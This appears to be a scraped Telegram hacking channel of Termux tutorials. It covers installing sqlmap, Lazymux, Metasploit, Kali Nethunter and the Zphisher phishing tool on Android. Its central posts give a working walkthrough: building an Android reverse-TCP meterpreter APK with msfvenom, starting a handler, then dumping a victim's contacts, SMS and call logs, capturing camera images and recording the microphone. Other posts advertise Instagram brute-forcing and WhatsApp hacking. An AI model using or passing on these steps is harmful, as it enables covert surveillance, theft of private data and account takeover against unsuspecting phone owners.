Termux Hackers (Users)
57.4K subscribers
127 photos
12 videos
8 files
183 links
╔╦╦╦═╦╗╔═╦═╦══╦═╗
║║║║╩╣╚╣═╣║║║║║╩╣
╚══╩═╩═╩═╩═╩╩╩╩═╝
Use This bot to contact with us
@Bot_Nospam_Bot

Check This bot @TermuxForAndroidBot
Download Telegram
Our bot @Bot_Nospam_Bot is now working 👏👏👏👏

Connect with us 👍👍
Our First Bash script

#Our first bash script
echo "Hello Termux users";


Copy this and paste in sublime text then save it as first.sh

Then open Termux , if you have storage access go to next step but if you dont have run this termux-setup-storage and hit enter

After the above step type this

cd storage
cd shared
Then
sh first.sh


Send screenshot to our bot if it work

Share And Support Us

t.me/Termux_For_Android
How To Install Recondog in Termux

ReconDog is information Gathering and Vulnerability Scanner Tool Written In Python

So Follow Below steps To Install And Use RecongDog in Termux

Firstly kill the session of Termux or You can start a New Session in a new window

Type

👉 pkg install Python2


It will prompt you to Termux will use some space on your device simply reply y for yes

After that now type

👉 git clone https://github.com/UltimateHackers/ReconDog.git

Now Type cd

Then type ls

Then type

👉 cd ReconDog


Then type

👉 python2 dog.py


Share And Support Us t.me/Termux_For_Android
How To Install SQLMAP in Termux

sqlmap is a most useful website vulnerability scanning Tool

Which is greatly used by Pentesters, Hackers, Security researchers

Sqlmap is written in Python so we need python environment for that we have to install python in Termux

Follow below steps Carefully

Firstly type

👉 pkg install python2

After installation

Type this command in Termux

👉 git clone https://github.com/sqlmapproject/sqlmap.git

It will take a few minutes to be Downloaded and installed

After Download just type this command

cd

Then type

ls


Then again type

cd sqlmap-dev

Then final step is type


👉 python2 sqlmap.py

Share and Support Us t.me/Termux_For_Android
How To Install Lazymux In Termux

Lazymux contains Several Hacking Tools of Kali Linux at One Place so now its easy to Install Lazymux In Termux

Lazymux Contains the Following Hacking Tools

[01] Sudo [11] SQLMap
[02] NMap [12] Black Hydra
[03] Hydra [13] Fl00d & Fl00d2
[04] FB Brute Force [14] Infoga
[05] Webdav [15]
LANs.py
[06] RED HAWK [16] Pagodo
[07] Brutal [17] FBUP
[08] Metasploit [18] KnockMail
[09] 1337Hash [19] Ufonet
[10] IPLoc [20] Commix
[21] D-Tect [31] ReconDog
[22] A-Rat [32] Meisha
[23] Torshammer [33] Kali NetHunter
[24] Slowloris [34] Ngrok
[25] DSSS [35] Weeman
[26] SQLiv [36] Cupp
[27] Wifite [37] Hash-Buster
[28] Wifite 2 [38] Routersploit
[29] MSFPC [39] Ubuntu
[30] Kwetza [40] Fedora

Follow Below Steps To Do So

Type this Command

👉 apt Update && apt upgrade

Now We have to Install git by typing this command

👉 pkg install git

Then Now We need Python2 environment in Termux so type the command pkg install python to install python

Now almost done type below command to install Lazymux on Termux

👉 git clone https://github.com/Gameye98/Lazymux

After Cloning successful

Type below command to find the Lazymux Directory

👉 cd Lazymux && ls

Now you have to type below command for menu of Lazymux Hacking Tools

👉 python lazymux.py


Now select your Desired Tool To Install and use

Note you're installed tools will be save to Lazymux Directory so always check the Lazymux directory after installing tools

Now its Possible even To Install Metasploit Frameworks and Many Other Hacking Frameworks in Termux

Share and Support Us
t.me/Termux_For_Android
Forwarded from Termux Hackers (Users) (ㅤㅤㅤㅤ ㅤ ㅤ)
Commands and Tools for Termux_v8.0_apkpure.com.apk
3 MB
Forwarded from Termux Hackers (Users) (ㅤㅤㅤㅤ ㅤ ㅤ)
Metasploit For Termux



Metasploit is an advanced hacking tool, which is now available for Termux, let's seehow to install Metasploit in Termux

We can install Metasploit in Termux by various methods
Forwarded from Termux Hackers (Users) (ㅤㅤㅤㅤ ㅤ ㅤ)
How to install and use Metasploit in Termux


To install Metasploit in Termux just type below commands

cd $HOME


Then type

pkg install wget


Then type

wget https://Auxilus.github.io/metasploit.sh


Finally type

bash metasploit.sh


That's all you have successfully installed Metasploit in Termux
To use Metasploit just type below command

 ./msfconsole

t.me/Termux_For_Android
Forwarded from Termux Hackers (Users) (ㅤㅤㅤㅤ ㅤ ㅤ)
Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit

In this article, we will learn how to hack an android device and exploit it according to one’s desires. Android is an operating system based on Linux kernel.   It usesan APK file format to install any application. Hence, our malware will also be in APK format. To construct the malware use the following msfvenom command :

msfvenom -p android/meterpreter/reverse_tcp lhost=YOUR IP ADDRESS lport=1234 > shell.apk

As the msfvenom malware is created, start the handler in order to have a session and for this type :


use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost YOUR IP ADDRESS

set lport 1234

exploit

t.me/Termux_for_Android
Forwarded from Termux Hackers (Users) (ㅤㅤㅤㅤ ㅤ ㅤ)
Nethunter for Termux users
we can run some linux root tools with this nethunter in Termux

Installation :
apt update
apt upgrade
apt install git
git clone https://github.com/Hax4us/Nethunter-In-Termux
cd Nethunter-In-Termux
chmod +x *
./kalinethunter
Now select your architecture
Now type this command to start

startkali
Compulsory Steps For First Time Use
So after startkali
execute this command

apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6
Now its time to update
apt-get update t.me/Termux_For_Android
Forwarded from Termux Hackers (Users) (Erni)
This media is not supported in your browser
VIEW IN TELEGRAM
Learn how to hack Instagram using Bruteforce from Android (Using Termux)

@Termux_For_Android
Forwarded from Termux Hackers (Users) (Erni)
Media is too big
VIEW IN TELEGRAM
How to Hack😮WhatsApp📲Using Metasploit(Termux)(No📱root)(100%working)[Professional]

@Termux_For_Android
Forwarded from Termux Hackers (Users) (Erni)
Step By Step to Hack Android Phone on LAN:


#1. Go to the Termux Application.

#2. Got to the Metasploit Directory using Cd command

#3. Type msfconsole and wait for a few minutes to get a Metasploit screen.




#4.  use exploit/multi/handler

I am running exploit for the multi/handler and execute our generated executable on the victim. The multi/handler handles the exploit for us and presents us with our shell.

#5. Set the reverse TCP android payload:


msf exploit(handler) > set payload android/meterpreter/reverse_tcp


#6. Set the local and remote hosts:


msf exploit(handler) > set lhost 192.168.0.20 lhost => 192.168.0.20


192.168.0.20 address is your phone IP address. Make sure when you are creating a payload type the LHOST= < your IP address >

You can check my post of creating a payload in Metasploit which is the first part of this post. Without reading that post it will be difficult for you to understand this post.


#7. Set the local port:


msf exploit(handler) > set lport 4444

lport => 4444



#8. Exploit

Now that you have a session open. Make sure the user clicks on the application/payload that you have made it for them and then you can begin with meterpreter.


t.me/Termux_For_Android
Forwarded from Termux Hackers (Users) (Erni)
HACKING COMMANDS:-


Thus, you have got full access control to your Victim’s mobile. you'll be able to enter:  command, for all the out there commands available to you for hacking. however, I'll try this for you we will use these below commands for hacking:-

Controlling the Victim’s Camera Firstly, to capture the picture from Front-Camera of Victim’s phone simply type this command:-


webcam_snap -i 2 -p storage/downloads/images232-F.jpg

Secondly,

If you wish to access back camera of Victim’s phone simply replace two within the previous command by one

webcam_snap -i 1 -p storage/downloads/image20200101.jpg

You can checkout your gallery or file manager(by default within the transfer folder) to envision the image captured by your Victim’s phone.

#2. obtaining all contacts from Victim’s phone

For accessing contacts from your Victim’s phone simply type this command:-


dump_contacts -o storage/downloads/Contacts.txt

A list of contacts is saved in your download folder particularly Contacts.txt.

#3. To access SMS from Victim’s phone

To scan all SMS from Victim’s phone similar to on top of type this command:-


dump_sms -o storage/downloads/SMS.txt

All the messages can by default get a hold on in your downloads folder particularly SMS.txt

#4. Fetching Call Logs

To get the call log details of your Victim’s android phone


dump_calllog -o storage/downloads/CallLog.txt

All the decision log details can by default get a hold on in your downloads folder particularly CallLog.txt

5. Accessing the recording files of the Victim’s phone

You can conjointly record audio through the Victim’s phone and listen to it on your phone. simply type this command:-


record_mic -d 10 -f storage/downloads/Spy-Record.mp3

By default, this command can record 10 seconds of audio.
You can modify the length of recording simply replace 10 by the time that you simply need like twenty for 20 seconds recording so on.


t.me/Termux_For_Android
Forwarded from Termux Hackers (Users) (Erni)
╔╦╦╦═╦╗╔═╦═╦══╦═╗
║║║║╩╣╚╣═╣║║║║║╩╣
╚══╩═╩═╩═╩═╩╩╩╩═╝


@Termux_For_Android - CHANNEL

@TermuxForAndroidGroup - GROUP

@TermuxForAndroidBot - BOT

@Bot_Nospam_Bot - COMMUNICATION BOT

Email vlthoiif@hi2.in
How To Install Kali Nethunter in Termux

What is Kali Nethunter?

Kali Nethunter is a Android ROM which is designed for Penetration Testing with Android Devices, Firstly Nethunter is Available for Nexus And Oneplus Devices,
And it also used to perform wireless attacks such as WiFi Hacking etc.
Once it is Possible to use on Nexus Devices only, But now you can install in any Android Device without Rooting through Termux App.

How to install kali nethunter in termux Installing Kali Nethunter in Termux is very Easy, and It can be done by using few commands

Before Installing Kali Nethunter, You Must Satisfy Below Requirements
Requirements:

A fully Charged Device
Good Internet Connection
At least 1GB RAM & 2 GB Free Space
Termux App Must Be Installed
Xserver XSDL App must Be Installed
A little bit of Patience😇


kali nethunter-termux commands

Follow Below steps to install nethunter in android
Step1: Firstly Download and install Termux from Play store
Step2: Now Open Termux and type this Command

apt update && apt upgrade

Step3: Now Type this Command

curl -LO
https://raw.githubusercontent.com/Hax4us/Nethunter-In-Termux/master/kalinethunter

Step4: Now Give Chmod Permission by entering this command

chmod +x kalinethunter


Step5: Now Type this Command to install all the Scripts that are required to install Nethunter

./kalinethunter

Step 5: Now You Have to execute this command to get started

startkali

Final Step: Now everything is OK, to get necessary keys, you must type this command

apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6

Must Type Below Command if you are installing for the first time

after startkali
execute this command

wget
https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb

Then

apt install ./kali-archive-keyring_2018.1_all.deb

Now you are ready to start using Kali Nethunter in Termux,

The Good News is You can Use Nethunter Graphical Interface Too

So

How To Use Graphical Interface?
If you're successfully installed Nethunter in Termux then follow below steps to use the graphical interface

Step 1: Firstly Open Termux then type this command

apt-get install lxde-core lxde kali-defaults kali-root-login desktop-base

This will take some time, so wait until everything is OK

Now install Xserver XSDL App from Play store

Then Download Additional Fonts (60MB), After download complete wait for some time, then open Nethunter and type this command

DISPLAY=
127.0.0.1:0 PULSE_SERVER=tcp:127.0.0.1:4712 startlxde &

Now Open Xserver App to start using Kali Nethunter, That's it


Please Share and Support us
t.me/Termux_For_Android
Zphisher is an Automated Phishing Tool for different types of phishing attacks.
Termux Hackers (Users)
Zphisher is an Automated Phishing Tool for different types of phishing attacks.
How to Install

Open the terminal and type following commands.

apt update && apt upgrade

apt install git

git clone git://github.com/htr-tech/zphisher.git

cd zphisher

bash zphisher.sh
Th3 Inspector is an OSINT tool used for information gathering and reconnaissance which is available on Github. One can easily find a lot of information about the target, such as details about the server, whois info, target IP, mobile number, email, sub-domains, etc.